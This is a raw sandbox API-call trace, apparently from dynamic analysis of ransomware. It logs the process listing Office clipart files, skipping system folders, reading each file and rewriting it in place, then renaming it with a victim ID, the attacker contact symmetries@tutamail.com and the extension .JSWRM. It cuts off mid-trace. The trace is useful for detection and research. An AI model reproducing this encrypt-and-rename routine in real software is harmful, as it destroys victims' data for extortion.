CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099178.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099178.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099178.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0079.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0079.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0079.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0079.895] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099178.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099178.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.895] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3606) returned 1 [0079.895] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe10) returned 0x23fc98 [0079.896] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xe10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xe10, lpOverlapped=0x0) returned 1 [0079.898] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.898] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xe10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xe10, lpOverlapped=0x0) returned 1 [0079.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0079.898] CloseHandle (hObject=0x314) returned 1 [0079.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0079.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0079.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0079.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0079.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0079.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0079.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.898] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099178.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099178.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099178.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099178.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0079.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0079.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0079.899] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe0a7b88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe0a7b88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe0a7b88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x23c2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099179.WMF", cAlternateFileName="")) returned 1 [0079.899] lstrcmpiW (lpString1="J0099179.WMF", lpString2=".") returned 1 [0079.899] lstrcmpiW (lpString1="J0099179.WMF", lpString2="..") returned 1 [0079.899] lstrcmpiW (lpString1="J0099179.WMF", lpString2="...") returned 1 [0079.899] lstrcmpiW (lpString1="J0099179.WMF", lpString2="windows") returned -1 [0079.899] lstrcmpiW (lpString1="J0099179.WMF", lpString2="recovery") returned -1 [0079.899] lstrcmpiW (lpString1="J0099179.WMF", lpString2="perflogs") returned -1 [0079.899] lstrcmpiW (lpString1="J0099179.WMF", lpString2="documents and settings") returned 1 [0079.899] lstrcmpiW (lpString1="J0099179.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.899] lstrcmpiW (lpString1="J0099179.WMF", lpString2="system volume information") returned -1 [0079.899] lstrcmpiW (lpString1="J0099179.WMF", lpString2="msocache") returned -1 [0079.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0079.899] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099179.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.899] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099179.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099179.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0079.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0079.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099179.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099179.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099179.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0079.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0079.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0079.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0079.900] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099179.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099179.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.901] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9154) returned 1 [0079.901] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x23c0) returned 0x24d210 [0079.901] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x23c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x23c0, lpOverlapped=0x0) returned 1 [0079.903] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.903] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x23c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x23c0, lpOverlapped=0x0) returned 1 [0079.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.903] CloseHandle (hObject=0x314) returned 1 [0079.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0079.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0079.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0079.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0079.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0079.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0079.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.903] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099179.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099179.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099179.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099179.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0079.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0079.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0079.904] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe0a7b88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe0a7b88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe0a7b88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd42, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099180.WMF", cAlternateFileName="")) returned 1 [0079.904] lstrcmpiW (lpString1="J0099180.WMF", lpString2=".") returned 1 [0079.904] lstrcmpiW (lpString1="J0099180.WMF", lpString2="..") returned 1 [0079.904] lstrcmpiW (lpString1="J0099180.WMF", lpString2="...") returned 1 [0079.904] lstrcmpiW (lpString1="J0099180.WMF", lpString2="windows") returned -1 [0079.904] lstrcmpiW (lpString1="J0099180.WMF", lpString2="recovery") returned -1 [0079.904] lstrcmpiW (lpString1="J0099180.WMF", lpString2="perflogs") returned -1 [0079.904] lstrcmpiW (lpString1="J0099180.WMF", lpString2="documents and settings") returned 1 [0079.904] lstrcmpiW (lpString1="J0099180.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.905] lstrcmpiW (lpString1="J0099180.WMF", lpString2="system volume information") returned -1 [0079.905] lstrcmpiW (lpString1="J0099180.WMF", lpString2="msocache") returned -1 [0079.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0079.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099180.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099180.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099180.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0079.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0079.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099180.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099180.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099180.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0079.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0079.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0079.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0079.905] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099180.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099180.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.905] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3394) returned 1 [0079.905] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd40) returned 0x23fc98 [0079.905] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xd40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xd40, lpOverlapped=0x0) returned 1 [0079.907] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.907] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xd40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xd40, lpOverlapped=0x0) returned 1 [0079.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0079.907] CloseHandle (hObject=0x314) returned 1 [0079.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0079.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0079.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0079.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0079.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0079.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0079.908] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0079.908] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0079.908] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.908] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099180.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099180.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099180.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099180.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.908] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0079.908] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0079.908] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0079.908] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe0a7b88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe0a7b88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe0a7b88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4ae, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099181.WMF", cAlternateFileName="")) returned 1 [0079.908] lstrcmpiW (lpString1="J0099181.WMF", lpString2=".") returned 1 [0079.908] lstrcmpiW (lpString1="J0099181.WMF", lpString2="..") returned 1 [0079.908] lstrcmpiW (lpString1="J0099181.WMF", lpString2="...") returned 1 [0079.909] lstrcmpiW (lpString1="J0099181.WMF", lpString2="windows") returned -1 [0079.909] lstrcmpiW (lpString1="J0099181.WMF", lpString2="recovery") returned -1 [0079.909] lstrcmpiW (lpString1="J0099181.WMF", lpString2="perflogs") returned -1 [0079.909] lstrcmpiW (lpString1="J0099181.WMF", lpString2="documents and settings") returned 1 [0079.909] lstrcmpiW (lpString1="J0099181.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.909] lstrcmpiW (lpString1="J0099181.WMF", lpString2="system volume information") returned -1 [0079.909] lstrcmpiW (lpString1="J0099181.WMF", lpString2="msocache") returned -1 [0079.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0079.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099181.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099181.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099181.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0079.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0079.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099181.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099181.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099181.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0079.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0079.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0079.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0079.909] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099181.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099181.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.909] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1198) returned 1 [0079.909] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4a0) returned 0x230a00 